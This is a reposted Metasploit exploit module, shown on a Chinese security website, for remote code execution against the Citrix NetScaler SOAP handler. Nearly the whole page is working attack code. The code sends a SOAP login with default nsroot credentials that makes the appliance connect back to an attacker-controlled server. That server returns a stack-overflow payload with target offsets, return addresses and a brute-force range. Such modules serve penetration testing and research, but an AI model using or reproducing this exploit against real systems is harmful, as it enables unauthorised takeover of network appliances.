首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Citrix NetScaler SOAP Handler Remote Code Execution Exploit
来源:metasploit.com 作者:vazquez 发布时间:2014-11-11  
##
# This module requires Metasploit: http://metasploit.com/download
##
  
require 'msf/core'
  
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
  
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::TcpServer
  include Msf::Exploit::Brute
  
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Citrix NetScaler SOAP Handler Remote Code Execution",
      'Description'    => %q{
        This module exploits a memory corruption vulnerability on the Citrix NetScaler Appliance.
        The vulnerability exists in the SOAP handler, accessible through the web interface. A
        malicious SOAP requests can force the handler to connect to a malicious NetScaler config
        server. This malicious config server can send a specially crafted response in order to
        trigger a memory corruption and overwrite data in the stack, to finally execute arbitrary
        code with the privileges of the web server running the SOAP handler. This module has been
        tested successfully on the NetScaler Virtual Appliance 450010.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Bradley Austin', # Vulnerability Discovery and PoC
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
        ],
      'Payload'        =>
        {
          'Space'          => 1024,
          'MinNops'        => 512,
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
        },
      'Arch'           => ARCH_X86,
      'Platform'       => 'bsd',
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'Targets'        =>
        [
          [ 'NetScaler Virtual Appliance 450010',
            {
              'RwPtr'        => 0x80b9000, # apache2 rw address / Since this target is a virtual appliance, has sense.
              'Offset'       => 606,
              'Ret'          => 0xffffda94, # Try before bruteforce...
              # The virtual appliance lacks of security mitigations like DEP/ASLR, since the
              # process being exploited is an apache child, the bruteforce attack works fine
              # here.
              'Bruteforce'   =>
                {
                  'Start' => { 'Ret' => 0xffffec00 }, # bottom of the stack
                  'Stop'  => { 'Ret' => 0xfffdf000 }, # top of the stack
                  'Step'  => 256
                }
            }
          ],
        ],
      'DisclosureDate' => "Sep 22 2014",
      'DefaultTarget'  => 0))
  
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to the soap handler', '/soap']),
        OptAddress.new('SRVHOST', [true, "The local host to listen on. This must be an address on the local machine reachable by the target", ]),
        OptPort.new('SRVPORT', [true"The local port to listen on.", 3010])
      ], self.class)
  end
  
  
  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path)
    })
  
    if res && res.code == 200 && res.body && res.body =~ /Server Request Handler.*No body received/m
      return Exploit::CheckCode::Detected
    end
  
    Exploit::CheckCode::Unknown
  end
  
  def exploit
    if ['0.0.0.0', '127.0.0.1'].include?(datastore['SRVHOST'])
      fail_with(Failure::BadConfig, 'Bad SRVHOST, use an address on the local machine reachable by the target')
    end
  
    if check != Exploit::CheckCode::Detected
      fail_with(Failure::NoTarget, "#{peer} - SOAP endpoint not found")
    end
  
    start_service
  
    if target.ret
      @curr_ret = target.ret
      send_request_soap
      Rex.sleep(3)
  
      if session_created?
        return
      end
    end
  
    super
  end
  
  def brute_exploit(addrs)
    @curr_ret = addrs['Ret']
    send_request_soap
  end
  
  def send_request_soap
    soap = <<-EOS
<?xml version="1.0" encoding="ISO-8859-1"?><SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<ns7744:login xmlns:ns7744="urn:NSConfig">
<username xsi:type="xsd:string">nsroot</username>
<password xsi:type="xsd:string">nsroot</password>
<clientip xsi:type="xsd:string">#{datastore['SRVHOST']}</clientip>
<cookieTimeout xsi:type="xsd:int">1800</cookieTimeout>
<ns xsi:type="xsd:string">#{datastore['SRVHOST']}</ns>
</ns7744:login>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
    EOS
  
    print_status("#{peer} - Sending soap request...")
  
    send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path),
      'data'   => soap
    }, 1)
  end
  
  def on_client_data(c)
    print_status("#{c.peerhost} - Getting request...")
  
    data = c.get_once(2)
    req_length = data.unpack("v")[0]
  
    req_data = c.get_once(req_length - 2)
    unless req_data.unpack("V")[0] == 0xa5a50000
      print_error("#{c.peerhost} - Incorrect request... sending payload anyway")
    end
  
    print_status("#{c.peerhost} - Sending #{payload.encoded.length} bytes payload with ret 0x#{@curr_ret.to_s(16)}...")
  
    my_payload = Rex::Text.pattern_create(target['Offset'])
    my_payload << [@curr_ret, target['RwPtr']].pack("V*")
    my_payload << payload.encoded
  
    pkt = [my_payload.length + 6].pack("v")
    pkt << "\x00\x00\xa5\xa5"
    pkt << my_payload
    c.put(pkt)
    c.disconnect
  end
  
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·i.Mage Local Crash Proof of Co
·Belkin n750 jump login Paramet
·i.Hex Local Crash Proof of Con
·PicsArt Photo Studio For Andro
·i-FTP Buffer Overflow SEH Expl
·ManageEngine Eventlog Analyzer
·X7 Chat 2.0.5 lib/message.php
·tnftp "savefile" Arbitrary Com
·Linux/x86 Add map in /etc/host
·Visual Mining NetCharts Server
·Linux Local Root => 2.6.39 (32
·Internet Explorer 8 MS14-035 U
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved